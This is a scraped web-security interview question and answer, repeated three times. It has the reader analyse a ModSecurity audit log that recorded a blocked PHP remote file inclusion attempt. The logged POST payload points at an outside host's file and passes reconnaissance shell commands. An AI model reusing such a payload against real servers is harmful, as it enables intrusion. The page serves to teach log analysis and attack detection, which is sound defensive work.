What application generated the log file entry below? What type of attack is this? Assuming the index - Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743 Handler: cgi-script ---------------------------------------- POST /index.php HTTP/1.1 Host: www.foo.com Connection: keep-alive Accept: */* Accept-Language: en-us Content-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla 4.0 (Linux) Content-Length: 65 X-Forwarded-For: 200.158.8.207 mod_security-message: Access denied with code 403. Pattern match "unamex20a" at POST_PAYLOAD mod_security-action: 403 65 lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a Goal of question to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons: * The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD. * The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command. - Web Security Interview Questions and Answers

CoolInterview.com - World's Largest Collection of Interview Questions & Answers, FAQs, queries, sample papers, exam papers, dumps, what, why, how, where, when questions

OneStopTesting.com - Testing EBooks, Tutorials, Articles, Jobs, Training Institutes etc.
OneStopGate.com - Gate EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopMBA.com - MBA EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopIAS.com - IAS EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopSAP.com - SAP EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopGRE.com - of GRE EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.

Sponsored Links

Interview Questions

INTERVIEW QUESTIONS

WEB

WEB SECURITY

DETAILS

Question: What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

Answer: Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php
HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20a"
at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

Goal of question to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:

* The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
* The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

Category	Web Security Interview Questions & Answers - Exam Mode / Learning Mode
Rating	(0.3) By 8018 users
Added on	9/3/2014
Views	72058
Rate it!

Question: What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

Answer:

Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php
HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20a"
at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

Goal of question to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:

* The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
* The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

Source: CoolInterview.com

If you have the better answer, then send it to us. We will display your answer after the approval.

Rules to Post Answers in CoolInterview.com:-

There should not be any Spelling Mistakes.

There should not be any Gramatical Errors.

Answers must not contain any bad words.

Answers should not be the repeat of same answer, already approved.

Answer should be complete in itself.

	Related Questions	View Answer
	What are some examples of you how you would attempt to gain access?	View Answer
	If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?	View Answer
	What are the most important steps you would recommend for securing a new web server? Web application?	View Answer
	What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?	View Answer
	What do you see as challenges to successfully deploying/monitoring web intrusion detection?	View Answer
	What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?	View Answer
	What do you see as the most critical and current threats effecting Internet accessible websites?	View Answer

Please Note: We keep on updating better answers to this site. In case you are looking for Jobs, Pls Click Here Vyoms.com - Best Freshers & Experienced Jobs Website.

View All Web Security Interview Questions & Answers - Exam Mode / Learning Mode